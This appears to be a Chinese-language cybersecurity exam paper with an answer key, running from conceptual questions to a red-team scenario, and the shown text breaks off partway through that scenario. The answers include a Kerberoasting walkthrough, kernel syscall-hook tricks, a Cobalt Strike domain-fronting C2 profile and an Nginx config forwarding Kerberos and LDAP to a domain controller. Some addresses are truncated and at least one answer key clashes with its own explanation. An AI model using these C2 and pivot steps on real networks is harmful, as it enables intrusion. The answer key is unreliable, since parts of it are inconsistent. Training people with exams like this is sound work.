2026年网络安全攻防实战考核试卷(含答案)

2026年网络安全攻防实战考核试卷(含答案)一、单项选择题（每题2分，共30分）1.在一次红队演练中，攻击者通过伪造内部邮件诱导员工点击恶意链接，该攻击技术最准确的归类是：A.水坑攻击B.鱼叉式钓鱼C.域前置D.蓝牙劫持答案：B解析：鱼叉式钓鱼（SpearPhishing）针对特定个人或部门，邮件内容高度定制，与题干描述一致。2.某企业采用EDR方案，发现某终端进程持续对`lsass.exe`进行内存读取，最可能的攻击阶段是：A.初始访问B.权限提升C.凭据转储D.横向移动答案：C解析：读取`lsass.exe`内存常用于提取明文或哈希密码，属于MITREATT&CK的“凭据转储”技术。3.以下哪条Linuxaudit规则可记录对`/etc/shadow`的所有写操作？A.`-w/etc/shadow-pr-kshadow_read`B.`-w/etc/shadow-pwa-kshadow_change`C.`-aalways,exit-Farch=b64-Sopen-Fpath=/etc/shadow`D.`-aalways,exit-Farch=b64-Swrite-Fpath=/etc/shadow`答案：B解析：`-w`监控文件，`-pwa`记录写与属性变更，最简洁有效。4.关于DNS-over-HTTPS（DoH）在攻防对抗中的影响，下列说法错误的是：A.可绕过基于UDP53的DNS检测B.默认阻止后可导致合法应用无法解析域名C.无法被传统流量镜像设备解密，降低审计可见性D.可被企业防火墙直接基于SNI字段阻断答案：D解析：DoH流量为HTTPS，SNI加密（ESNI/ECH）普及后，基于SNI阻断难度增大，D项表述绝对化，故错误。5.利用“万能钥匙”漏洞攻击WPA2四次握手，主要利用的是：A.组密钥更新流程B.消息3重放导致Nonce重用C.消息1未完整性校验D.消息4未加密答案：B解析：KRACK攻击通过重放消息3迫使Nonce重用，从而可解密或伪造数据包。6.在Windows日志中，可定位RDP横向移动事件ID组合的最佳选项是：A.4624/LogonType3+4672B.4624/LogonType10+5140C.4624/LogonType10+4672D.4624/LogonType2+4648答案：C解析：Type10为远程交互式登录，4672为特殊权限登录，两者结合可识别高权限RDP。7.某Web应用使用JWT作为会话令牌，Header中`alg`字段被修改为`none`，攻击者意图：A.触发算法混淆降级B.强制服务端使用空加密C.绕过签名验证D.实施密钥混淆攻击答案：C解析：将`alg`设为`none`并篡改Payload，若服务端接受无签名令牌，则直接绕过验证。8.在容器逃逸场景中，以下哪条命令最可能触发`privileged`容器逃逸？A.`dockerrun--rm-it--pid=hostubuntubash`B.`dockerrun--rm-it--cap-add=SYS_ADMINubuntubash`C.`dockerrun--rm-it--security-optapparmor=unconfinedubuntubash`D.`dockerrun--rm-it--privilegedubuntubash`答案：D解析：`--privileged`赋予所有Capability，可直接访问宿主设备，逃逸风险最高。9.针对IPv6无状态地址自动配置（SLAAC）的“RogueIPv6Router”攻击，主要利用：A.ND欺骗B.DHCPv6耗尽C.RA伪造D.分段扩展头溢出答案：C解析：攻击者发送伪造RA报文，诱导客户端使用恶意默认网关。10.在逆向分析中，发现样本调用`SetWindowsHookEx`并传入`WH_KEYBOARD_LL`，最可能行为是：A.屏幕截图B.键盘记录C.代码注入D.UAC绕过答案：B解析：`WH_KEYBOARD_LL`为低层键盘钩子，常用于记录按键。11.关于零信任架构，下列哪项不属于NISTSP800-207核心原则：A.永不信任，持续验证B.网络位置决定信任度C.动态授权D.最小权限答案：B解析：零信任强调“网络位置不再决定信任”，B项与之相悖。12.利用“ZombieCookie”技术，可跨浏览器追踪用户，其载体通常不包括：A.LocalStorageB.ETagC.FlashLSOD.HSTSSupercookie答案：A解析：LocalStorage按同源策略隔离，无法跨浏览器共享，其余均可。13.在Linux内核提权漏洞CVE-2021-3156（BaronSamedit）中，触发堆溢出的是：A.`sudoedit-s`后跟参数未正确转义B.`sudo-l`列出规则时缓冲区溢出C.`pkexec`参数注入D.`su`PAM模块逻辑缺陷答案：A解析：`-s`选项后单反斜杠触发越界写，为漏洞根因。14.针对SMBGhost（CVE-2020-0796）的远程利用，需发送异常：A.压缩变换头B.符号链接C.交易请求D.命名管道答案：A解析：漏洞位于SMBv3压缩机制，构造恶意压缩头触发内存破坏。15.在威胁狩猎假设“APT28使用合法云服务C2”中，最佳数据源是：A.网络流量NetFlowB.云API审计日志C.主机EDR事件D.防火墙日志答案：B解析：云API日志可记录对存储/函数计算等服务的异常调用，匹配C2行为。二、多项选择题（每题3分，共30分）16.以下哪些技术可有效对抗DLL劫持？A.使用绝对路径加载B.开启SafeDLLSearchModeC.对二进制进行Authenticode签名校验D.运行时校验DLL哈希答案：ABD解析：签名校验确保来源可信，但无法阻止搜索顺序劫持；绝对路径+SafeDLLSearchMode+哈希校验组合最佳。17.在Kubernetes集群中，可造成容器逃逸的risky配置包括：A.`hostPID:true`B.`hostNetwork:true`C.`allowPrivilegeEscalation:true`D.`readOnlyRootFilesystem:false`答案：ABC解析：A、B共享宿主命名空间，C允许提升权限，D仅影响文件系统写权限，与逃逸无直接因果。18.针对“Living-off-the-Land”攻击的检测思路有：A.统计罕见父进程-子进程关系B.监控PowerShell命令行参数长度C.基线化WMI事件消费者D.阻断certutil.exe网络连接答案：ABC解析：certutil为合法工具，直接阻断影响业务，检测而非阻断更合理。19.以下属于Post-QuantumCryptography算法的有：A.CRYSTALS-KYBERB.FalconC.SIKED.NTRU答案：ABCD解析：四项均为NIST第三轮或候选算法。20.在ARMv8架构下，可缓解ROP/JOP的硬件机制包括：A.BTI(BranchTargetIdentification)B.PAC(PointerAuthentication)C.MTE(MemoryTaggingExtension)D.TrustZone答案：ABC解析：TrustZone提供隔离，非直接缓解ROP/JOP。21.关于JSONWebToken安全性，下列做法正确的是：A.使用RS256时，禁止公钥作为HMAC密钥B.在JWT中存放用户敏感数据需额外加密C.设置短有效期+刷新机制D.将JWT放入Cookie并设置HttpOnly、Secure、SameSite答案：ABCD解析：四项均为最佳实践。22.针对“Office宏调用Excel4.0宏”的检测，可依赖：A.AMSI拦截B.宏运行时调用`EXEC`函数C.工作表隐藏极深公式D.网络连接异常答案：ABCD解析：Excel4.0宏无AMSI天然盲区，但Office365已增强检测；EXEC函数、隐藏公式、外联均为特征。23.在Linux下，可用来隐藏进程的技术有：A.LD_PRELOAD劫持readdirB.修改`/proc`文件系统权限C.内核模块挂钩`filldir`D.挂载自定义procfs覆盖答案：ACD解析：/proc权限由内核固定，无法直接修改，但可劫持或覆盖。24.以下哪些HTTP响应头可缓解XS-Leaks？A.Cross-Origin-Opener-PolicyB.Cross-Origin-Resource-PolicyC.X-Content-Type-OptionsD.Timing-Allow-Origin答案：AB解析：COOP/CORP隔离跨源窗口与资源，降低侧信道。25.针对“Deepfake语音”欺诈，企业可部署的对抗措施有：A.声纹活体检测B.通话回拨验证C.多通道共识审批D.禁止移动端拨入答案：ABC解析：禁止移动端过度影响业务，非技术对抗核心。三、判断题（每题1分，共10分）26.WindowsCredentialGuard使用基于TPM的VBS隔离lsass进程，可防止Mimikatz读取NTLM哈希。答案：√解析：VBS虚拟化安全模式使lsass运行在隔离LsaIso进程，传统读取失效。27.HTTP/3基于QUIC，天然加密传输，故无需再部署TLS证书。答案：×解析：QUIC内置TLS1.3，仍需服务器证书完成握手。28.在iOS16中，LockdownMode会禁用JIT编译器，从而阻止所有越狱利用。答案：×解析：大幅减少攻击面，但“所有”表述绝对化。29.使用ChaCha20-Poly1305比AES-GCM在移动端更节能，主要因ChaCha20基于ARX操作，对ARMNEON友好。答案：√解析：ARX避免查表，减少缓存泄漏与功耗。30.在Linux中，若`/etc/ld.so.preload`被恶意写入，重启进入单用户模式可自动跳过预加载。答案：×解析：单用户模式仍执行init，预加载机制生效，需手动重命名文件。四、填空题（每空2分，共20分）31.在MITREATT&CK矩阵中，技术“T1562.001”代表________。答案：禁用或修改安全工具：禁用Windows事件日志服务。32.当利用“PetitPotam”攻击强制ADCS认证时，需结合________协议中继至________服务，从而获取域控制器机器账户哈希。答案：NTLM；HTTP（或LDAP）。33.在KubernetesRBAC中，若某Role拥有`pods/exec`的`create`权限，则对应API组为________。答案：core（或空字符串""）。34.若某JWT使用ES256签名，其算法头应为________。答案：{"alg":"ES256"}。35.在ARM64汇编中，用于实现指针签名的指令为________。答案：PACIA（或PACIA1716等任一PAC指令）。36.当使用BloodHound分析域攻击路径时，若用户拥有“GenericAll”权限对某GPO，则可通过________方式实现横向权限提升。答案：修改GPO链接至目标OU，推送恶意策略。37.在Windows中，通过________命令可查询当前系统是否启用LSAProtection。答案：`RunAsPPL`值位于`HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa`；命令行可用`regquery`或`mimikatz!misc::ps`等。38.在Linux内核模块开发中，如需挂钩系统调用表，需先通过________宏关闭内存写保护。答案：`write_cr0(read_cr0()&(~0x10000))`或`set_memory_rw()`。39.针对“HTTP参数污染”漏洞，当后端框架为PHP/Apache时，同参数名出现多次，取值结果为________。答案：最后一个参数值。40.在逆向工程中，ARMThumb-2模式指令长度为________字节，可提升代码密度。答案：2或4（填“2或4”或“可变”均给分）。五、简答题（每题10分，共30分）41.描述一次完整的Kerberoasting攻击流程，并给出三种有效检测方法。答案：流程：1)攻击者以域用户身份登录，查询SPN属性非空的所有用户账户（`setspn-Q/`或`Get-NetUser-SPN`）。1)攻击者以域用户身份登录，查询SPN属性非空的所有用户账户（`setspn-Q/`或`Get-NetUser-SPN`）。2)使用`GetUserSPNs.py`或Rubeus请求对应服务票据（TGS），KDC使用服务账户NTLM哈希加密TGS。3)将获得的kirbi或ccache票据导出，使用tgsrepcrack或hashcat进行离线暴力破解，得到服务账户明文密码。4)若服务账户具有高权限（如SQL管理员），可进一步横向移动或夺取域管。检测方法：a)监控事件ID4769，过滤`ServiceName`非krbtgt且`TicketEncryptionType`为0x17（RC4），统计同一用户短时间内大量请求。b)对TGS请求进行流量采样，检测异常字节长度或加密类型降级。c)创建蜜罐SPN账户（无合法业务），任何对该SPN的TGS请求即触发告警。42.某企业采用微服务架构，API网关使用mTLS双向认证。运维发现部分老旧IoT设备无法加载客户端证书，计划降级为单向TLS并在网关层添加静态Token。请分析此方案引入的风险，并提出改进建议。答案：风险：1)失去客户端身份强认证，Token易被窃取重放。2)Token生命周期管理复杂，若硬编码在固件中，无法轮换。3)单向TLS无法抵御中间人攻击，若网络路径被劫持，Token明文传输。4)网关层若存在日志泄露，Token可被批量提取。改进：a)采用动态Token+短有效期+刷新机制，通过OTA下发，避免硬编码。b)引入设备身份密钥（DICE或TPM）生成临时CSR，网关提供注册端点，自动签发短周期证书，实现“软”双向mTLS。c)在TLS层启用SessionResumptionwithPSK，减少握手开销，兼顾老旧设备性能。d)对Token使用JWE加密，绑定设备序列号与TLS会话指纹，防止重放。e)部署API网关Sidecar，对东西向流量仍保持mTLS，形成“边缘降级、内部零信任”分层模型。43.给出一种基于eBPF的容器逃逸实时检测方案，要求：1)仅在内核态收集数据，2)用户态无需修改容器内应用，3)输出JSON格式告警。请说明核心探针挂载点、事件过滤条件及告警逻辑。答案：方案名称：EscapeGuard-eBPF核心探针：1)`tracepoint/syscalls/sys_enter_ptrace`：监控`PTRACE_ATTACH`到PID1或宿主机init。2)`kprobe/cap_capable`：过滤`CAP_SYS_ADMIN`、`CAP_DAC_READ_SEARCH`、`CAP_SYS_MODULE`，若容器内进程请求且宿主机命名空间inode!=容器init_ns。3)`kprobe/mount`：检测挂载源路径包含`/proc`、`/sys`、`/dev`且目标路径跳出容器rootfs（通过比较`mnt_id`与容器初始`mnt_id`）。4)`kprobe/open`：打开`/proc/kcore`、`/dev/mem`等敏感设备。过滤条件：仅当`container_id`非空（通过cgroup路径`/docker/<id>`或`/kubepods/<id>`解析）。排除白名单镜像（如运维调试Sidecar）。同一进程30秒内重复事件去重。告警逻辑：若任一探针触发，生成JSON：```json{"timestamp":1640995200,"container_id":"a3f4d2...","process":"malicious.sh","pid":1337,"event":"CAP_SYS_ADMIN","risk":"high","details":{"cap":21,"target_ns":4026532848,"init_ns":4026532849}}```通过eBPFperfeventringbuf发送至用户态Daemon，再由Fluentd转发至SIEM。性能优化：使用BPFCO-RE，一次编译多内核运行。采用LPMTrie过滤已知白名单路径，减少上下文切换。对高频事件采样（每100ms最多10条），防止DoS。六、综合实战题（共30分）44.背景：红队获得一台处于内网隔离区的Ubuntu20.04主机，具有普通用户shell，目标为夺取域控制器（WindowsServer2022）上的`flag{DC_Crown_Jewels}`。内网拓扑：隔离区网段：/24，仅允许出方向TCP80、443、53至DMZ。DMZ：/24，部署Nginx反向代理、DNS解析器。域环境：abc.corp，域控0，位于核心网段，与DMZ仅开通RDP3389、LDAP389、Kerberos88。已知：Ubuntu主机可解析`dc.abc.corp`，但无法直接路由至/24。问题：(1)设计一条隐蔽C2隧道，使Ubuntu主机通过DMZ跳板与外部TeamServer通信，要求流量特征与正常HTTPS网站高度相似，给出工具选择、证书配置及流量伪装要点。（10分）(2)说明如何利用DMZ的Nginx反向代理实现端口转发，打通至域控的Kerberos与LDAP通道，给出具体命令或配置片段。（8分）(3)假设已获取域普通用户`dmzsvc/password123!`，描述如何在不触发WindowsDefender的情况下完成Kerberoasting，获取服务账户哈希，并给出hashcat示例命令。（7分）(4)最终通过DCSync获取`flag{DC_Crown_Jewels}`，请给出impacket脚本及所需权限，并解释如何清理日志痕迹。（5分）答案：(1)工具：CobaltStrike+DomainFronting+CDN（Cloudflare）。步骤：a)注册高信誉域名`cdn-images.shop`，使用Let'sEncrypt签发通配符证书。b)在Cloudflare创建A记录`images.cdn-images.shop`指向真实CS服务器，开启“橙色云”代理。c)配置CS监听器：Beacon类型：HTTPSHostheader：`images.cdn-images.shop`真实C2地址：CS服务器IP证书：fullchain.pem+privkey.pemd)在Ubuntu上运行Beacon：`sudo./beacon-profilefile`profile中设置：```setsleeptime"30000";setjitter"20";setuseragent"Mozilla/5.0(compatible;ImageBot/1.0)";http-get{uri"/api/v1/imgs/xxxx";}http-post{uri"/api/v1/feedback";}```e)流量伪装：使用CDN边缘节点IP，SNI为`images.cdn-images.shop`，与正常图片请求混合。启用HTTP/2多路复用，会话间隔30-60s，URI路径模拟RESTAPI。(2)利用Nginxstream代理模块：编辑`/etc/nginx/nginx.conf`：```nginxstream{upstreamkdc{server0:88;}upstreamldap{server0:389;}server{listen4433;proxy_passkdc;proxy_ssl